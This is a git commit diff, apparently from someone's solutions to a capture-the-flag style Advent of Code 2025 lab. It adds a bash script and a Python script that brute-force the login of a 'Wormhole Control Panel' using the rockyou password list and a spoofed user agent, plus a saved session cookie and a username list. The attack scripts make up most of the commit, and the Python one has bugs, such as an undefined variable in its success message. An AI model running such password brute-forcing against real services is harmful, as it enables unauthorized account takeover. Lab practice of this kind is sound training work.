2026-03-11

2026-03-11 10:56:27 +01:00
parent 1b6dfea090
commit 0e30222666
37 changed files with 4467 additions and 0 deletions
--- a/AoC/2025/24/.bruteforce.sh.swp
+++ b/AoC/2025/24/.bruteforce.sh.swp
--- a/AoC/2025/24/bruteforce.sh
+++ b/AoC/2025/24/bruteforce.sh
@@ -0,0 +1,10 @@
+for word in $(cat /usr/share/wordlists/rockyou.txt); do
+	response=$(curl -s -A "secretcomputer" -X POST -d "username=admin&password=$word" http://10.82.144.99/terminal.php?action=login)
+	#echo $response
+	status=$(echo $response | jq -e ".status" | tr -d '"')
+	printf "Checking %s with status %s               \r" "$word" "$status"
+	if [ "$status" != "fail" ]; then
+		echo "Credentials are admin:$word"
+		break
+	fi
+done
--- a/AoC/2025/24/cookie.txt
+++ b/AoC/2025/24/cookie.txt
@@ -0,0 +1,5 @@
+# Netscape HTTP Cookie File
+# https://curl.se/docs/http-cookies.html
+# This file was generated by libcurl! Edit at your own risk.
+
+10.82.144.99	FALSE	/	FALSE	0	PHPSESSID	r6grvo93glp6pc1ocqkvfrcelp
--- a/AoC/2025/24/username.py
+++ b/AoC/2025/24/username.py
@@ -0,0 +1,49 @@
+import requests
+import json
+import os
+
+#{
+#    "service": "Wormhole Control Panel",
+#    "endpoints": {
+#        "\/terminal.php?action=info": "Public info",
+#        "\/terminal.php?action=login": "POST: username,password",
+#        "\/terminal.php?action=pin": "POST: attempt PIN to get temporary admin token",
+#        "\/terminal.php?action=status": "GET: wormhole status",
+#        "\/terminal.php?action=close": "POST: close wormhole"
+#    },
+#    "note": "This panel only answers to terminal user agents. Use the endpoints to fully close the wormhole."
+#}  
+
+def main():
+    wordlist = "/usr/share/wordlists/rockyou.txt"
+    url = "10.81.152.59"
+    proto = "http"
+    target = "terminal.php?action=login"
+    user_agent = "secretcomputer"
+    headers = {"User-Agent": user_agent}
+    username = ["user", "admin"]
+
+    lines = int(os.popen(f"wc -l {wordlist}").read().split()[0])
+    print(lines)
+    count = 0
+
+    try:
+        with open(wordlist, 'r') as file:
+            for user in username:
+                for word in file:
+                    count += 1
+                    print(f"Bruteforce in progress: {count/2/lines:0.000000f}%", end="\r")
+                    data = {"username": user, "password": word}
+                    response = requests.post(f"{proto}://{url}/{target}", data=data, headers=headers).json()
+                    if isinstance(response, dict):
+                        if response["status"] != "fail":
+                            print(f"Credentials found: {user}:{password}")
+    except FileNotFoundError:
+        print("File not found")
+        return
+    except Exception as e:
+        print(f"An Error occured: {e}")
+        return
+
+if __name__ == "__main__":
+    main()
--- a/AoC/2025/24/username.txt
+++ b/AoC/2025/24/username.txt
@@ -0,0 +1,2 @@
+user
+admin